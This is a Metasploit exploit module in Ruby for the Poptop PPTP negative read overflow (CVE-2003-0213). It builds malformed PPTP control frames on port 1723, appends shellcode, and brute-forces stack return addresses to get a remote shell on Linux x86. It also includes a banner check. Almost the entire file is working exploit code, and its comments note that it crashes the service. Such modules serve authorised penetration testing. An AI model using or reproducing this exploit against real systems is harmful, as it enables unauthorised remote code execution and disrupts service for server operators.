##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
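class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Brute

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Poptop Negative Read Overflow',
        'Description' => %q{
          This is an exploit for the Poptop negative read overflow. This will
          work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
          currently do not have a good way to detect Poptop versions.
          The server will by default only allow 4 concurrent manager processes
          (what we run our code in), so you could have a max of 4 shells at once.
          Using the current method of exploitation, our socket will be closed
          before we have the ability to run code, preventing the use of Findsock.
        },
        'Author' => 'spoonm',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0213'],
          ['OSVDB', '3293'],
          ['URL', 'https://web.archive.org/web/20210120064041/http://securityfocus.com/archive/1/317995'],
          ['URL', 'https://web.archive.org/web/20061215104830/http://www.freewebs.com/blightninjas/']
        ],
        'Privileged' => true,
        'Payload' => {
          # Payload space is dynamically determined (see payload_space below:
          # PreReturnLength + ExtraSpace).
          'MinNops' => 16,
          'StackAdjustment' => -1088,
          'Compat' => {
            'ConnectionType' => '-find'
          }
        },
        'SaveRegisters' => ['esp'],
        'Platform' => 'linux',
        'Arch' => ARCH_X86,
        'Targets' => [
          [
            'Linux Bruteforce',
            {
              # Return address is brute-forced downwards from Start to Stop.
              # 'Step' => 0 leaves the step size to the Brute mixin's default,
              # which is derived from the payload's NOP sled.
              'Bruteforce' => {
                'Start' => { 'Ret' => 0xbffffa00 },
                'Stop' => { 'Ret' => 0xbffff000 },
                'Step' => 0
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2003-04-09',
        # Each failed guess crashes the handling process, so a brute-force run
        # is noisy: expect service disruption and PPTP daemon log entries.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options(
      [
        # PPTP control connection port.
        Opt::RPORT(1723)
      ]
    )

    register_advanced_options(
      [
        OptInt.new('PreReturnLength', [true, 'Space before we hit the return address. Affects PayloadSpace.', 220]),
        OptInt.new('RetLength', [true, 'Length of returns after payload.', 32]),
        OptInt.new('ExtraSpace', [
          true,
          'The exploit builds two protocol frames, the header frame and the control frame. ' \
          'ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). ' \
          "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " \
          "(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.",
          0
        ]),
        OptString.new('Hostname', [false, 'PPTP Packet hostname', '']),
        OptString.new('Vendor', [true, 'PPTP Packet vendor', 'Microsoft Windows NT']),
      ]
    )
  end

  # Dynamic payload space calculation
  #
  # Overrides the framework hook so the available payload size follows the
  # advanced options instead of a fixed 'Space' value. The optional target
  # argument is accepted for interface compatibility and ignored.
  #
  # @return [Integer] PreReturnLength + ExtraSpace, both read from the datastore
  def payload_space(_explicit_target = nil)
    datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
  end

  # Build a PPTP Start-Control-Connection-Request frame.
  #
  # Layout (big-endian): 2-byte length, message type 1 (control message),
  # magic cookie 0x1a2b3c4d, control message type 1 (SCCRQ), 2 reserved bytes,
  # protocol version bytes 1.0, 2 reserved bytes, framing/bearer capabilities,
  # maximum channels, firmware revision 2600, then the Hostname and Vendor
  # datastore strings NUL-padded to 64 bytes each. Hostname is optional and
  # defaults to '', so ljust always receives a String.
  #
  # @param length [Integer] value written into the length field; a genuine
  #   SCCRQ is 156 bytes, and check passes exactly that
  # @return [String] the encoded frame
  def build_packet(length)
    [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
      [1, 0].pack('cc') +
      [0].pack('n') +
      [1, 1, 0, 2600].pack('NNnn') +
      datastore['Hostname'].ljust(64, "\x00") +
      datastore['Vendor'].ljust(64, "\x00")
  end

  # Banner check: send a well-formed 156-byte SCCRQ and look for the
  # "MoretonBay" vendor string in the reply. As the Description says, this
  # only identifies a Poptop/PPTP service, not a vulnerable version, so it
  # reports Detected rather than Vulnerable.
  #
  # The socket is always released: the original left the connection open on
  # every path, and with the 4-process manager limit noted in the Description
  # a few leaked check() connections could exhaust the service.
  #
  # @return [Msf::Exploit::CheckCode] Detected on a banner match, else Safe
  def check
    connect
    sock.put(build_packet(156))
    res = sock.get_once

    if res && res =~ /MoretonBay/
      return CheckCode::Detected
    end

    CheckCode::Safe
  ensure
    # disconnect tolerates a nil sock, so this is safe even if connect raised.
    disconnect
  end

  # One brute-force iteration, invoked by the Brute mixin with the current
  # 'Ret' guess between the target's Start and Stop addresses.
  #
  # @param addrs [Hash] mixin-supplied addresses; only addrs['Ret'] is used
  # @return [void]
  def brute_exploit(addrs)
    connect

    print_status("Trying #{'%.8x' % addrs['Ret']}...")

    # Construct the evil length packet: the undersized length field (1) is the
    # trigger for the negative read described in the module Description, and
    # the encoded payload is followed by RetLength / 4 little-endian copies of
    # the guessed return address (integer division, so RetLength < 4 yields none).
    packet =
      build_packet(1) +
      payload.encoded +
      ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))

    sock.put(packet)

    handler
    disconnect
  end
end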